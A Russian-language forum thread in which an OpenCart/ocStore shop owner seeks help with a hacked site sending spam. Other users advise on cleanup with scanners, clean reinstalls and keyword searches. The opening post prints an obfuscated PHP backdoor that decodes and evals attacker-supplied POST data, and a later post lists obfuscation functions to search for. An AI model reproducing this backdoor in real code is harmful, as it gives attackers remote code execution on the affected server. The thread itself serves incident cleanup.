Jump to content
Sign in to follow this  
hitball

Каждый день вредоносный код(((

Recommended Posts

Здравствуйте, уважаемая поддержка!

Регулярно на сайте появляется вредоносный код, хостеру жалуются на рассылку спама с нашего сервера. Количество писем доходит до 20000, постепенно они превращаются в мертвые.

Код такого плана добавляется в файлы сайта, но многие файлы он создает сам!

<?php                                                                                                                                                                                                                                                               $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['na82bec'])) {eval($s21(${$s20}['na82bec']));}?>
<?php                                                                                                                                                                                                                                                               $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n538c51'])) {eval($s21(${$s20}['n538c51']));}?><?php
// Heading
$_['heading_title'] = 'Приветствие';
?>

Файлы и код появляются хаотично по всему сайту. К примеру сегодня удалила из папок image, vqmod, system, catalog примерно 30 кусков этого кода.

 

 

Магазин ocStore Version 1.5.4.1

Очень много стоит модулей. 

Помогите понять в чем проблема, пока нас не попросили с хостинга(((

Share this post


Link to post
Share on other sites

Первая и основная причина,здравствуй варез и с ним все вирусы...

Вторая менее вероятная,наличие по соседству  WP или Joomla.

Share this post


Link to post
Share on other sites

WP и Joomla нет. Остается варез. Как проверить. что из модулей может быть варезом? 

Share this post


Link to post
Share on other sites

WP и Joomla нет. Остается варез. Как проверить. что из модулей может быть варезом? 

:-D то что стоит денег, а вы решили взять бесплатно на сомнительных сайтах и есть варез

https://ru.wikipedia.org/wiki/%D0%92%D0%B0%D1%80%D0%B5%D0%B7

Share this post


Link to post
Share on other sites

это понятно, но не все модули ставила я... Как определить, что из модулей варез? Я так понимаю, что проблема в этих файлах. И если удалить эти ворованные модули, то вирусы тоже не будут закачиваться?

Share this post


Link to post
Share on other sites

не факт. Ваши файлы системные уже скорее всего заражены.

Для начала можете сравнивать с файлами установщика в папке - system/library , так же проверьте htaccess, и пересмотрите папку vqmod/xml/

Share this post


Link to post
Share on other sites

pashast, сейчас проверяю virusdie это ведь по сути то же самое?

timedontwait, спасибо, сейчас сравню.

Share this post


Link to post
Share on other sites

Да поддерживаю aibolit используйте. Толковая утилита

Share this post


Link to post
Share on other sites

не вышло у меня запустить айболит с сервера к сожалению( 

ребята, подскажите, есть ли в исходных файлах строки, которые содержат eval, base64_decode, gzinflate или str_rot13?

может по этим словам поискать?

Share this post


Link to post
Share on other sites

Ситуация ваша плачевная.И сколько бы вам тут не давали ссылок на разных айболитов,100% гарантии что вылечите всё нет .Пробуйте восстановить файлы из бэкапа на хостинге.Впредь знайте,что весь бесплатный сыр,как правило в мышеловках.

Share this post


Link to post
Share on other sites

Tom, та да. Вот ругались на этих паразитов: "Мы работали, работали, а паршивцы пришли и нагадили",  а сами по сути так же поступили. Да и в начале всегда пытаешься сэкономить. Ну обожглись - набрались опыта( И в нашей ситуации самое плачевное бэкап тоже заражен(

Share this post


Link to post
Share on other sites

Тогда как по мне ,выход у вас один.Собрать магазин  из чистого архива, установить в него только самые нужные модули(естественно не пытаться на авось опять залить варезную халяву).

Папку с картинками слейте и прогоните на компе  анти-вирусником.Останется только  вставить конфиги и проверенную  папку с картинками  и заменить нынешнего больного,на просветлённого нового))))

Share this post


Link to post
Share on other sites

Tom, да, это видимо единственный выход( что самое смешное, модули, которыми пользуемся действительно, мы купили, а заливали ерунду какую-то, которой ни разу и не воспользовались(

Share this post


Link to post
Share on other sites

Айболит не лечит, айболит -  экспресс диагностика.

 

Лечат другие средства...

Share this post


Link to post
Share on other sites

chukcha, с радостью выслушаю ваше предложение по лечению сайта

Share this post


Link to post
Share on other sites

destreser, странный этот антивирус. Ругается на кучу здоровых файлов  :ugeek: 

Share this post


Link to post
Share on other sites

Значит вручную перебирайте каждый файл.

Share this post


Link to post
Share on other sites

destreser, перелопатила таки все файлы, которые яндекс выдал. и реально нашла несколько мерзких кодов. держу кулачки, чтобы помогло) спасибо вам большое! и всем спасибо за ответы!

Share this post


Link to post
Share on other sites

Код был во всех файлах, которые Манул пометил или только в некоторых? Помечены они были красным или желтым?

Share this post


Link to post
Share on other sites

в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w"

 сегодня пока ничего не лезет, очень надеюсь, что помогло!

Share this post


Link to post
Share on other sites

в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w"

 сегодня пока ничего не лезет, очень надеюсь, что помогло!

Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции?

Share this post


Link to post
Share on other sites

Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции?

 

Еще одна инструкция https://opencartforum.com/topic/47034-вирус-плодит-htaccess/?do=findComment&comment=405514

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.